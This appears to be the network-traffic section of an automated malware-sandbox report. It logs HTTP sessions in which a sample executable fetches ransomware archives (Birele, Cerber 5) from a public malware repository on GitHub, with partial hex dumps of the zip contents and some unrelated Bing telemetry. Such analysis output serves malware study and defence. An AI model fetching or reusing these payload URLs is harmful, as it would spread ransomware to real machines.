                                                                                                                                                Content-Length: 89890
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488077680&AC=1&CPH=4ef661f2
                                                                                                                                                2022-09-29 12:48:08 UTC90OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                                                                                                                                Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                                                                                                                                2022-09-29 12:48:08 UTC106OUTData Raw: 3a 38 2c 22 50 4c 22 3a 31 2c 22 4b 22 3a 32 31 2c 22 52 52 54 22 3a 7b 22 43 47 22 3a 32 36 2c 22 4d 52 55 22 3a 32 37 2c 22 4d 50 50 22 3a 32 37 2c 22 4d 53 54 22 3a 32 37 2c 22 4d 46 46 22 3a 32 37 2c 22 49 46 46 22 3a 33 37 2c 22 50 50 22 3a 34 36 2c 22 57 65 62 22 3a 37 31 7d 2c 22 52 46 54 22 3a 7b 22 50 50 22 3a 37 31 2c 22 4d 50 50 22 3a 37 31 2c 22 4d 53 54 22 3a 37 31 2c 22 43 47 22 3a 37 31 7d 2c 22 54 52 52 22 3a 5b 7b 22 56 22 3a 36 39 2c 22 54 22 3a 22 50 50 22 7d 5d 2c 22 49 52 54 22 3a 7b 22 31 30 30 31 2e 31 54 22 3a 7b 22 42 22 3a 34 39 2c 22 45 22 3a 36 38 2c 22 54 22 3a 22 50 50 22 7d 2c 22 31 30 30 32 2e 31 53 22 3a 7b 22 42 22 3a 35 34 2c 22 45 22 3a 36 39 2c 22 54 22 3a 22 50 50 22 7d 7d 7d 5d 2c 22 53 54 41 54 45 22 3a 7b 22 57 65
                                                                                                                                                Data Ascii: :8,"PL":1,"K":21,"RRT":{"CG":26,"MRU":27,"MPP":27,"MST":27,"MFF":27,"IFF":37,"PP":46,"Web":71},"RFT":{"PP":71,"MPP":71,"MST":71,"CG":71},"TRR":[{"V":69,"T":"PP"}],"IRT":{"1001.1T":{"B":49,"E":68,"T":"PP"},"1002.1S":{"B":54,"E":69,"T":"PP"}}}],"STATE":{"We
                                                                                                                                                2022-09-29 12:48:08 UTC122OUTData Raw: 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 6a 6d 2f 75 2f 2f 40 30 2f 56 32 25 32 46 32 2c 53 57 56 43 2f 2f 30 2f 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 22 2c 22 54 53 22 3a 31 36 33 32 33 35 39 32 30 34 31 30 31 2c 22 52 54 53 22 3a 31 35 32 33 2c 22 53 45 51 22 3a 31 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 55 54 53 22 3a 31 36 36 34 34 38 38 30 38 37 37 32 35 7d 5d 5d 3e 3c 2f 44 3e 3c 54 53 3e 31 36 33 32 33 35 39 32 30 34 31 30 31 3c 2f 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 49 51 75 65 75 65 45 72 72 6f 72 3c 2f 54 3e 3c 49 47
                                                                                                                                                Data Ascii: /-1/-1/-1/-1+jm/u//@0/V2%2F2,SWVC//0/@1/-1/-1/-1/-1/-1/-1","TS":1632359204101,"RTS":1523,"SEQ":1,"CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","UTS":1664488087725}...</D><TS>1632359204101</TS></E><E><T>Event.CIQueueError</T><IG
                                                                                                                                                2022-09-29 12:48:08 UTC138OUTData Raw: 7b 31 41 43 31 34 45 37 37 2d 30 32 45 37 2d 34 45 35 44 2d 42 37 34 34 2d 32 45 42 31 41 45 35 31 39 38 42 37 7d 5c 5c 63 6f 6d 65 78 70 2e 6d 73 63 22 2c 22 44 4e 61 6d 65 22 3a 22 43 6f 6d 70 6f 6e 65 6e 74 20 53 65 72 76 69 63 65 73 22 2c 22 41 70 70 4c 6e 63 68 22 3a 30 2c 22 41 72 67 73 22 3a 30 2c 22 4d 44 4e 22 3a 30 2c 22 45 78 74 22 3a 22 2e 6d 73 63 22 7d 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67 53 63 6f 72 65 22 3a 31 2e 33 37 33 38 38 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 31 22 3a 31 2c 22 37 22 3a 39 35 36 39 2c 22 38 22 3a 31 2c 22 31 30 22 3a 35 2c 22 31 33 22 3a 32 2c 22 31 36 22 3a 39 35 36 39 2c 22 31 39 22 3a 31 2c 22 34 32 22 3a 31 2c 22 38 33 22 3a 31 2c 22 31 33 34 22 3a 31 33 2c
                                                                                                                                                Data Ascii: {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\comexp.msc","DName":"Component Services","AppLnch":0,"Args":0,"MDN":0,"Ext":".msc"},"RankerSignals":{"rankingScore":1.37388,"featureStore":{"1":1,"7":9569,"8":1,"10":5,"13":2,"16":9569,"19":1,"42":1,"83":1,"134":13,
                                                                                                                                                2022-09-29 12:48:08 UTC154OUTData Raw: 52 54 55 41 4c 5f 55 52 4c 3f 71 72 79 3d 69 26 73 65 74 6c 61 6e 67 3d 65 6e 2d 55 53 26 63 63 3d 55 53 26 6e 6f 68 73 3d 31 26 63 70 3d 31 26 63 76 69 64 3d 31 34 65 66 38 30 39 34 36 39 37 35 34 63 33 66 39 37 30 65 65 34 38 30 33 36 35 37 61 38 65 32 26 69 67 3d 37 39 39 38 35 37 30 30 63 62 38 63 34 31 32 36 38 38 34 66 32 39 36 63 36 34 38 36 30 64 30 63 26 41 53 49 6e 69 74 49 47 3d 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 22 2c 22 52 65 73 6f 75 72 63 65 73 56 65 72 73 69 6f 6e 22 3a 22 38 5f 30 31 5f 30 5f 30 30 30 30 30 30 22 7d 2c 22 54 53 22 3a 31 36 30 31 34 37 37 35 36 38 31 39 32 2c 22 55 54 53 22 3a 31 36 36 34 34 38 38 30 38 37 37 32 35 2c 22 55 78 43 6c 61 73 73 69 66 69 63 61 74 69
                                                                                                                                                Data Ascii: RTUAL_URL?qry=i&setlang=en-US&cc=US&nohs=1&cp=1&cvid=14ef809469754c3f970ee4803657a8e2&ig=79985700cb8c4126884f296c64860d0c&ASInitIG=C0409E84C7EC4D16A2CDDA4805E2D3C4","ResourcesVersion":"8_01_0_000000"},"TS":1601477568192,"UTS":1664488087725,"UxClassificati
                                                                                                                                                2022-09-29 12:48:08 UTC170OUTData Raw: 22 3a 22 77 69 6e 64 6f 77 73 22 7d 2c 22 43 6f 6f 6b 69 65 73 22 3a 7b 22 4d 55 49 44 22 3a 22 31 45 31 37 42 39 42 37 30 45 39 42 34 43 36 45 39 35 37 44 31 35 39 45 44 33 36 34 36 46 46 46 22 2c 22 5f 53 53 22 3a 7b 22 43 50 49 44 22 3a 22 31 36 36 34 34 38 38 30 37 37 36 38 30 22 2c 22 41 43 22 3a 22 31 22 2c 22 43 50 48 22 3a 22 34 65 66 36 36 31 66 32 22 7d 7d 7d 5d 5d 3e 3c 2f 44 3e 3c 50 61 67 65 3e 3c 4e 61 6d 65 3e 50 61 67 65 2e 53 6d 61 72 74 53 65 61 72 63 68 2e 41 53 2e 53 75 67 67 65 73 74 69 6f 6e 73 3c 2f 4e 61 6d 65 3e 3c 4c 3e 3c 21 5b 43 44 41 54 41 5b 5b 7b 22 54 22 3a 22 4c 2e 42 6f 78 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 52 65 67 69 6f 6e 22 3a 22 43 6f 72 65 22 2c 22 4c 22 3a 5b 7b 22 54 22 3a
                                                                                                                                                Data Ascii: ":"windows"},"Cookies":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","_SS":{"CPID":"1664488077680","AC":"1","CPH":"4ef661f2"}}}...</D><Page><Name>Page.SmartSearch.AS.Suggestions</Name><L><![CDATA[[{"T":"L.Box","AppNS":"SmartSearch","Region":"Core","L":[{"T":
                                                                                                                                                2022-09-29 12:48:08 UTC178INHTTP/1.1 204 No Content
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                X-MSEdge-Ref: Ref A: E8FDCD03542046369303D30443DC876A Ref B: FRA31EDGE0219 Ref C: 2022-09-29T12:48:08Z
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:07 GMT
                                                                                                                                                Connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                10192.168.2.349688185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:29 UTC579OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                11185.199.108.133443192.168.2.349688C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:29 UTC579INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 116134
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:29 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6962-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455710.807078,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 9587fd306d8388811ef48723dccc5447d25e3612
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:29 GMT
                                                                                                                                                Source-Age: 270
                                                                                                                                                2022-09-29 12:48:29 UTC580INData Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf
                                                                                                                                                Data Ascii: PK?Endermanch@Birele.exexRzYn]&m|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
                                                                                                                                                2022-09-29 12:48:29 UTC596INData Raw: d0 c8 6f b8 bd af f1 df 66 87 9a 7e fd b6 77 ca 44 32 b6 e7 9c 56 4c 9b 1d c9 17 fe c2 fb 3f 48 22 03 9e 02 2a 47 c7 30 bb 3e 6b 9c fd 3c b1 6f fd fc 13 d0 41 9f 51 54 c9 79 e0 45 0c 28 b0 f0 50 47 36 0c 16 93 29 66 33 6d 8d a9 b6 aa df 0c 0e 61 e1 f3 e4 8a 0a e7 ea 6d f3 f8 52 92 1a a7 0a d1 18 7e d5 9c b6 f9 7a 06 75 e2 58 84 0a f2 f5 48 e1 5e 20 9e a7 75 9a f3 63 3a c4 a0 83 20 05 0f d1 7d a6 12 4f ce ac b3 18 6f 47 47 38 38 6a 53 73 91 8f 00 16 a3 b4 c7 db 95 28 a2 ad 71 fd 54 f2 1b 26 6d 45 4f 74 38 73 60 21 c8 00 2e 82 63 52 20 cc be e4 d4 29 92 81 e0 4f 0b 14 08 ff 0a 8d 9c 95 d0 a9 6a 16 7e c7 af 5d 04 84 cd 1d 58 a6 73 66 04 d9 b4 86 6a b5 9a 9b 7b 9a d3 a7 b0 c3 a9 87 1e 2c 2d bb 2d 39 47 fc 3b bc ef 66 79 6e 61 c8 e9 bc 6e 00 a4 8f 1b e2 2f 42
                                                                                                                                                Data Ascii: of~wD2VL?H"*G0>k<oAQTyE(PG6)f3mamR~zuXH^ uc: }OoGG88jSs(qT&mEOt8s`!.cR )Oj~]Xsfj{,--9G;fynan/B
                                                                                                                                                2022-09-29 12:48:29 UTC612INData Raw: 20 6a 5b d3 14 76 ba 3f 41 47 9d 45 4c 14 86 7f 02 77 7c cc 51 e0 d7 e5 e7 2e 84 cb 39 19 06 7c 42 86 72 5b ca 4b 79 da d8 2d 2d 85 30 67 06 0e 90 0f d5 4e 42 7c 12 06 27 c2 ed bf 55 ae 7a 51 d6 de bf c9 8e b0 95 7b 59 e8 89 01 d2 8c 75 a3 5d 10 ef 63 8a 63 35 da d3 67 85 21 36 3b 66 29 1d 4c 10 85 c9 7d f9 82 ab 23 91 91 44 da 54 2e cd e2 33 c0 57 6d 7f 44 ec 53 1c ad f8 ac 94 33 5b 2b 1f b8 70 44 57 2a fb 76 ea f7 39 ff 45 e9 71 4e 8e 6f 21 a0 95 9d d5 e6 26 91 4a 6f d5 06 78 99 d7 ec b5 53 b6 28 64 0b 5b 18 9c 7a a1 f8 0c b6 fc dd 19 49 48 dd cf 4f da 37 ad ba 0a 2c 8e 62 cb 0a fe 92 2d f0 41 be d9 ef 63 8f 42 d3 a5 1c 5d 95 9b 60 3a ea dc d4 ec f6 1b 8b e4 0d 31 e3 35 fb 29 cc 7a 9d 0a 61 b7 e9 79 a4 a2 ed 88 f4 82 a3 5e ed 7c 9b 15 cb f9 bc 8f 43 12
                                                                                                                                                Data Ascii: j[v?AGELw|Q.9|Br[Ky--0gNB|'UzQ{Yu]cc5g!6;f)L}#DT.3WmDS3[+pDW*v9EqNo!&JoxS(d[zIHO7,b-AcB]`:15)zay^|C
                                                                                                                                                2022-09-29 12:48:29 UTC628INData Raw: f5 19 bb 37 94 5b bd a3 c7 eb 87 c0 8f ea 5e bb ec 1b 24 80 9b aa 2a 29 a6 84 88 16 72 c1 80 26 ae e4 0f e2 b0 1a a8 9b 8e 99 6c f5 2b bd 32 e8 a5 df 06 0b cd f6 7a 8b b8 ee 42 3c 3b d2 d1 f8 8a df 34 14 77 3b 39 9d f5 d1 44 7b bb 1f 46 ca 6b c0 7a 8c e6 dc 7f 4f ad 27 93 49 1d 69 51 47 ab 20 e4 e5 e1 b2 49 70 7a a1 60 24 83 fc c5 69 03 e5 cc 69 dd 0a 8c c3 e5 55 53 f0 e7 1c eb c6 5b 27 90 17 87 a5 1e a8 9e 68 81 b1 6e 18 46 d4 2b bd de f1 97 28 bd ce af 3b e0 28 05 30 2b dc ba 10 93 e6 f6 a2 16 a5 76 72 70 98 35 e6 bd a2 ad c6 b0 eb 75 12 26 0f c0 ee 40 63 1a 6b 57 a7 31 4b 82 3d 90 f4 05 04 9e c9 26 39 8c a6 dd f2 ba 10 cc 02 9b 78 ca d2 ec 9b be dd b0 e4 2f e1 8f 42 f4 82 af 1f a3 0f e7 50 f9 a4 1d ef 06 2d 5a b0 54 9a 75 14 07 f2 a9 67 aa 2f 6a a3 5c
                                                                                                                                                Data Ascii: 7[^$*)r&l+2zB<;4w;9D{FkzO'IiQG Ipz`$iiUS['hnF+(;(0+vrp5u&@ckW1K=&9x/BP-ZTug/j\
                                                                                                                                                2022-09-29 12:48:29 UTC644INData Raw: ca ea a1 2d 75 b0 19 3c 8c 4a 3c 06 10 11 06 e6 6a 3f 60 30 70 fb e5 ea 53 4c fc c1 a5 3f a3 33 f0 28 8d 3b 4b 89 5f ef 3e d9 b8 1c be 97 1e e8 f2 ab 7f 61 3d 43 0d 92 0e 5f 40 82 ff e7 e6 84 33 b4 d5 83 09 0e 48 79 33 fe 51 aa 08 fe fe 06 15 89 e0 7c 75 ed fe 99 5b 81 1c 81 95 f0 2d 6b a8 1f ff 71 f3 94 b7 1a cf e9 82 85 5b 24 e9 ed 9e dd f1 38 ec 79 e1 7f 73 ef 3e 8f 71 a9 06 84 53 ed 21 8f 81 45 62 45 38 2a b5 cf 98 23 54 6a 3a c2 f4 dd 6b 22 78 ec ec d9 d8 4d 9a 59 13 0d 57 e9 3c a1 39 fe 92 ad 58 98 18 0e 55 f1 86 28 31 a2 6e 3c bb 90 7e 8e 14 7f d3 8c 78 43 00 20 fe 05 40 bc 01 63 6b e8 32 6f 52 4b 19 d0 ab 3c a2 8c b5 b9 19 12 e8 4f 06 fe 5c 60 9c f8 1b 26 d5 65 b0 40 14 ea a7 b9 7c e4 ab 07 e8 b1 76 03 02 5f e8 48 d1 84 c4 96 d8 8d 8f c2 11 03 75
                                                                                                                                                Data Ascii: -u<J<j?`0pSL?3(;K_>a=C_@3Hy3Q|u[-kq[$8ys>qS!EbE8*#Tj:k"xMYW<9XU(1n<~xC @ck2oRK<O\`&e@|v_Hu
                                                                                                                                                2022-09-29 12:48:29 UTC660INData Raw: 52 17 55 a4 43 09 06 7e 3a 7d 82 ce d4 05 34 23 ce d1 67 77 09 83 09 76 6c a7 9d c7 3f 21 dd 00 cf 5f 2e b6 ec aa d6 b9 bb 0f 02 b0 54 26 dd 89 7d 73 63 b0 8f 44 24 e4 06 d2 cd f6 ec 34 a9 9e a2 64 b1 5e 6c 4a 9e da f4 82 e1 94 db 6b e6 c3 2e 82 73 0d a4 6e cb bd 11 65 1f 68 e3 91 db 2e 0f 7e 3a 8d a0 9c 07 d7 4e 7a 9f 64 da 58 02 84 b1 73 b9 f3 e7 88 44 65 a5 05 24 5c 30 08 54 f8 38 04 2a 7b e3 6f fb 2e 5a 85 46 5a 2f a7 40 d1 5b d2 58 ca 63 65 52 75 ec 09 70 4d 81 82 19 82 ec 63 23 31 18 d1 03 4a 1b d9 f8 da 13 8d 0e 2c 14 17 e0 2d a2 ba 46 83 0c 16 b4 6a 42 16 67 fc d5 d4 51 9d 8b cd 52 ad 17 e0 47 58 e2 c0 96 63 bf 04 6b 77 60 09 c6 1c d4 43 6e 5e 35 bd df 52 60 6d 6a 4d a6 96 b4 da a2 8a 08 50 b7 ba 75 f9 70 37 87 4b 59 d1 ea 6d 97 ad 89 bf 61 d7 99
                                                                                                                                                Data Ascii: RUC~:}4#gwvl?!_.T&}scD$4d^lJk.sneh.~:NzdXsDe$\0T8*{o.ZFZ/@[XceRupMc#1J,-FjBgQRGXckw`Cn^5R`mjMPup7KYma
                                                                                                                                                2022-09-29 12:48:29 UTC676INData Raw: 06 4e 72 bf f8 5c a6 65 95 70 02 af 5c 43 bb 5a df ad 63 6f 11 0e 88 d3 f3 84 e9 d0 8e 87 ed ad a4 7b 49 b5 74 1b dc fa c4 3a ab 2b b1 53 6d 8c 66 31 0a 9d 54 d9 2a 9c 03 71 eb d5 1c dc e9 1b 4e 7b 83 70 60 ef 3f 31 db 49 cc 6a 16 ca 3b fe 43 d5 b1 0a 58 12 45 cd af 39 53 1d 4e fe 11 53 a5 35 4a fe 62 ff 80 e2 91 21 98 c4 6f 81 52 32 70 fd eb b7 73 cf ff a4 02 9e 75 d2 dc 9a a1 f1 ee d5 1d ce f8 c7 2f 2c 4c 1b c3 d1 39 c9 cc 29 bb 7a 70 89 cd e6 42 4a d3 05 2a b0 f3 30 03 63 93 f2 5e 1e 07 4f 13 83 33 4c 1f 09 7e fb c6 92 e3 36 7c 8b 46 f8 e7 4f 06 c4 c4 f7 be af 18 4c 9b ff b1 a3 f7 20 59 85 cd 87 5b fb 3e 50 23 e5 bd bf 21 d4 d4 f5 7f e0 d2 4f a5 f0 29 f0 d1 05 a0 d2 14 89 a2 f6 d0 36 22 94 54 f6 13 6f 03 7d 0c 83 cd c4 3b 22 dd 4d 61 61 d7 f6 c8 a6 ac
                                                                                                                                                Data Ascii: Nr\ep\CZco{It:+Smf1T*qN{p`?1Ij;CXE9SNS5Jb!oR2psu/,L9)zpBJ*0c^O3L~6|FOL Y[>P#!O)6"To};"Maa
                                                                                                                                                2022-09-29 12:48:29 UTC692INData Raw: e5 ab bf f1 59 8c ea b7 bd 6a f1 b9 57 73 3f b0 b8 e7 8d df 46 47 a3 cd 0e b2 7b ca d9 87 a0 db e2 d0 cb 92 38 cf 69 5e 59 39 8f 9c 3b 24 df 75 26 7a b8 4b 96 f5 c6 65 bb 71 ad ea b4 6b 0b 7f 45 10 b5 46 52 d2 e4 3c 36 c7 6c 28 c1 40 29 7e 89 ee 56 39 57 20 4a df 30 bc 7b df ac 37 66 73 19 63 69 f3 a6 f0 69 48 e5 73 a4 ea d8 79 62 48 24 c2 51 a7 4b cf f4 13 2b a0 6e 84 67 3b 91 ae 55 90 94 46 93 56 c7 d0 88 d0 18 6e 75 b7 b3 96 e3 43 09 4a f7 08 ac 74 63 b0 12 30 ec 3d 9d e4 62 d1 96 30 b8 69 22 48 1a 98 72 ac 90 59 a5 fb 86 2b a7 41 b2 6b 56 af 38 f7 31 2a ce 31 e2 05 a4 dc 01 d4 49 0d 0b 20 d0 00 99 f9 7b 0e f0 a5 80 11 84 ad 92 79 5e 38 9f 8b fb dc a4 77 f2 52 8c c8 c3 ff 1a 74 80 72 47 ff cf e6 a8 c5 e6 83 55 74 6e 40 e5 91 e1 a0 78 18 f9 73 2d 7e 08
                                                                                                                                                Data Ascii: YjWs?FG{8i^Y9;$u&zKeqkEFR<6l(@)~V9W J0{7fsciiHsybH$QK+ng;UFVnuCJtc0=b0i"HrY+AkV81*1I {y^8wRtrGUtn@xs-~


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                12192.168.2.349689140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:30 UTC693OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                13140.82.121.4443192.168.2.349689C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:30 UTC694INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:28 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:30 UTC694INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                14192.168.2.349690185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:30 UTC696OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                15185.199.108.133443192.168.2.349690C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:31 UTC696INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 185620
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "2a6ab7c5316fce8fcdfa21d92de6f495abe9a21496869efff37027ac0d4eb5d5"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 9E7E:A32C:78ED2E:8681D5:6335928B
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:31 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6971-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455711.922025,VS0,VE170
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 7e5d435b590507e93de9fc1cec22aba940f31cae
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:31 GMT
